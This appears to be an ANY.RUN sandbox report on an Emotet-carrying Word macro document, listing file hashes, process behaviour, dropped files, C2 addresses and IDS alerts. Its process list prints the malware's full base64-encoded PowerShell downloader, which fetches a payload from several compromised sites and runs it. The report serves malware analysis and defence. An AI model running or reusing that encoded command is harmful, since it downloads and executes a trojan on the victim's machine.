analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Archivo_20190918_71558875.doc

Full analysis: https://app.any.run/tasks/091d9bf4-acc8-4238-b8fd-ca01103dbc61
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 12:24:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tasty Dynamic Down-sized, Subject: holistic, Author: Lindsay Ratke, Comments: Faroe Islands background backing up, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:22:00 2019, Last Saved Time/Date: Wed Sep 18 07:22:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

D4309AB844831F8BEC68AC66785E4FE0

SHA1:

9E31695DF8239A22AC5AA20A9699B2501126B902

SHA256:

D45BCEB690C5CBBADAE8871062F16AF7209DDD8E70A1B73EBCF6957EEB423495

SSDEEP:

6144:m0qZiq86MofT1K82zw1qWmWPLkIp7NSU4jJntATfDAAvLipwwPCQ3cqw:m0qZiq86MofT1K82zw1qWmEXp7NSU4V4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 373.exe (PID: 2640)
      • 373.exe (PID: 3732)
      • easywindow.exe (PID: 3740)
      • 373.exe (PID: 2412)
      • 373.exe (PID: 3820)
      • easywindow.exe (PID: 2920)
      • easywindow.exe (PID: 3772)
      • easywindow.exe (PID: 3004)
    • Connects to CnC server

      • easywindow.exe (PID: 3772)
    • Emotet process was detected

      • 373.exe (PID: 2640)
    • EMOTET was detected

      • easywindow.exe (PID: 3772)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2344)
      • 373.exe (PID: 2640)
    • Executed via WMI

      • powershell.exe (PID: 2344)
    • PowerShell script executed

      • powershell.exe (PID: 2344)
    • Creates files in the user directory

      • powershell.exe (PID: 2344)
    • Application launched itself

      • 373.exe (PID: 3732)
      • easywindow.exe (PID: 2920)
    • Starts itself from another location

      • 373.exe (PID: 2640)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3516)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Tasty Dynamic Down-sized
Subject: holistic
Author: Lindsay Ratke
Keywords: -
Comments: Faroe Islands background backing up
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 06:22:00
ModifyDate: 2019:09:18 06:22:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Raynor LLC
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Reilly
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
7
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 373.exe no specs 373.exe no specs 373.exe no specs #EMOTET 373.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3516"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Archivo_20190918_71558875.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2344powershell -encod JAB6AHoATAA5AHMAYwA3AFUAPQAnAG0AVwBiAEoATwA0ACcAOwAkAEMAbgAwAFAAcgB0ACAAPQAgACcAMwA3ADMAJwA7ACQAcwBLAHEAdwA0AHUAPQAnAEIAcwBJAGIAagBqAFMAdQAnADsAJABJAEMAMABmAFEAdgBGADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAbgAwAFAAcgB0ACsAJwAuAGUAeABlACcAOwAkAEsAVgBoAGsAOABaAEIASgA9ACcAdQBaAEcANAA1AG8AMwAnADsAJAB3AG8AaQAzAFMAdQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAQgBjAGwAaQBFAG4AdAA7ACQAQwBXAGIAYQAzAHcARABzAD0AJwBoAHQAdABwADoALwAvAGQAaQByAHAAcgBvAHAAZQByAHQAaQBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBmAGQAMQA0ADkAOQA5AC8AQABoAHQAdABwADoALwAvAHIAdQBuAC0AZwBlAHIAbQBhAG4AeQAuAGMAbwBtAC8AcwBjAHIAaQBwAHQAcwAvAGoAYwA4ADIAOAAyADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBzAGEAeAB0AG8AcgBwAGgALgBuAGUAdAAvAEQATwBDAC8ANQBuAGQAcQBvAHYAMAAxADgALwBAAGgAdAB0AHAAcwA6AC8ALwBzAHUAawBoAHUAbQB2AGkAdABoAG8AbQBlAHMALgBjAG8AbQAvAHMAYQB0AGgAbwByAG4AYwBvAG4AZABvAHMALgBjAG8AbQAvAHUAYwB3AG4AYQA3ADkANAAvAEAAaAB0AHQAcAA6AC8ALwB2AGEAbgBzAGMAaABlAGUAcgBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AZwBvAHIAcAA3AHYANAA1ADUAMwA3ADAALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAJwBAACcAKQA7ACQAQwBUAE4ARAB0ADUAPQAnAGoATgB3AEoAYQAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABqAFgASQBPAFIASAB0ACAAaQBuACAAJABDAFcAYgBhADMAdwBEAHMAKQB7AHQAcgB5AHsAJAB3AG8AaQAzAFMAdQAuACIAZABPAHcAYABOAGAATABvAGAAQQBkAGYASQBsAEUAIgAoACQAagBYAEkATwBSAEgAdAAsACAAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAWABoAFIATwBRAHYAPQAnAEEAMQBuAGwAUABpADMAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAQwAwAGYAUQB2AEYANQApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMgA1ADgAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAVAAiACgAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAUwBfAFIAegByAFQAPQAnAHcASwBpAGkAYQA1AHQAJwA7AGIAcgBlAGEAawA7ACQAaQBhAEQAUwBrAGIAPQAnAE4AQgAwAEUAVwBHAGoAQQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAEwAdABrADcARgBXAHcAPQAnAFIATQBzAGgARwB2AEcAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2412"C:\Users\admin\373.exe" C:\Users\admin\373.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3732"C:\Users\admin\373.exe" C:\Users\admin\373.exe373.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3820--92e680edC:\Users\admin\373.exe373.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2640--92e680edC:\Users\admin\373.exe
373.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3740"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe373.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2920"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3004--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3772--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 765
Read events
1 273
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9BD7.tmp.cvr
MD5:
SHA256:
3516WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D0A8533.wmfwmf
MD5:2358A6A797A89AE7DDF06D7950D0031E
SHA256:3D2BAB6974D823DEC4F9358EA2A905598072D21CD50C71B0AAEA3E609B4E0ED7
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A9B144E.wmfwmf
MD5:785B76A95F531A19699D51F293AF39C7
SHA256:A6E1D5250D1C501306F743A658530E8AC1D30044D6F20F3E90EE9222114348C7
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5F951BF7.wmfwmf
MD5:51EA3C4ACA7F04B3DB6CF71A1E84388F
SHA256:8FE120AC905129B55F0F00CE4E0EEE5A874B8F160AAF3089207C08E9E2C26D3F
3516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:9DE6A49C20C1E4ACA933F9A256A8BAD3
SHA256:9F33D38976AE59C087D1968B666DA9B1A3A3F714907E3AF451B221F16432A590
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EC961598.wmfwmf
MD5:54C0424A9CE5E05AEBE7F1894EF9C347
SHA256:446255F9AF8A17A7923CA19903BB4FF8B1BB5EB9B2E55216EE495470FCE9DAA9
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47964812.wmfwmf
MD5:C1A87723822439AF6B575D35B0A77746
SHA256:8F75D1FFCFAF371667EF18C8B1F26CB4742F7D74EC6EC92A5306D24BC936A1D1
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80304766.wmfwmf
MD5:6201CACCEAC7A306A584D4E9B150EACB
SHA256:48016641169FDF2B581E2632B241CA4FECB8FBEB2F1BC7C4A2394275FAC811C0
3516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE9DA01D.wmfwmf
MD5:1A2C5846FDBB3EE8145258C4AAC904E0
SHA256:688EE3468FA0EA5A5729F36669A1DBFCCE62DE84BCF0492B565061A1764E917E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2344
powershell.exe
GET
200
173.254.28.118:80
http://dirproperties.com/cgi-sys/suspendedpage.cgi
US
html
7.41 Kb
suspicious
2344
powershell.exe
GET
406
93.191.156.116:80
http://saxtorph.net/DOC/5ndqov018/
DK
html
221 b
suspicious
2344
powershell.exe
GET
302
173.254.28.118:80
http://dirproperties.com/cgi-bin/fd14999/
US
html
301 b
suspicious
3772
easywindow.exe
POST
114.79.134.129:443
http://114.79.134.129:443/taskbar/xian/ringin/merge/
IN
malicious
2344
powershell.exe
GET
404
81.169.145.69:80
http://run-germany.com/scripts/jc828208/
DE
html
196 b
malicious
3772
easywindow.exe
POST
189.166.68.89:443
http://189.166.68.89:443/nsip/mult/ringin/
MX
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3772
easywindow.exe
114.79.134.129:443
D-Vois Broadband Pvt Ltd
IN
malicious
2344
powershell.exe
173.254.28.118:80
dirproperties.com
Unified Layer
US
suspicious
2344
powershell.exe
93.191.156.116:80
saxtorph.net
Zitcom A/S
DK
suspicious
3772
easywindow.exe
189.166.68.89:443
Uninet S.A. de C.V.
MX
malicious
2344
powershell.exe
45.120.148.57:443
sukhumvithomes.com
A2 Hosting, Inc.
SG
suspicious
2344
powershell.exe
81.169.145.69:80
run-germany.com
Strato AG
DE
malicious

DNS requests

Domain
IP
Reputation
dirproperties.com
  • 173.254.28.118
suspicious
run-germany.com
  • 81.169.145.69
malicious
saxtorph.net
  • 93.191.156.116
suspicious
sukhumvithomes.com
  • 45.120.148.57
suspicious

Threats

PID
Process
Class
Message
3772
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3772
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3772
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3772
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3772
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
6 ETPRO signatures available at the full report
No debug info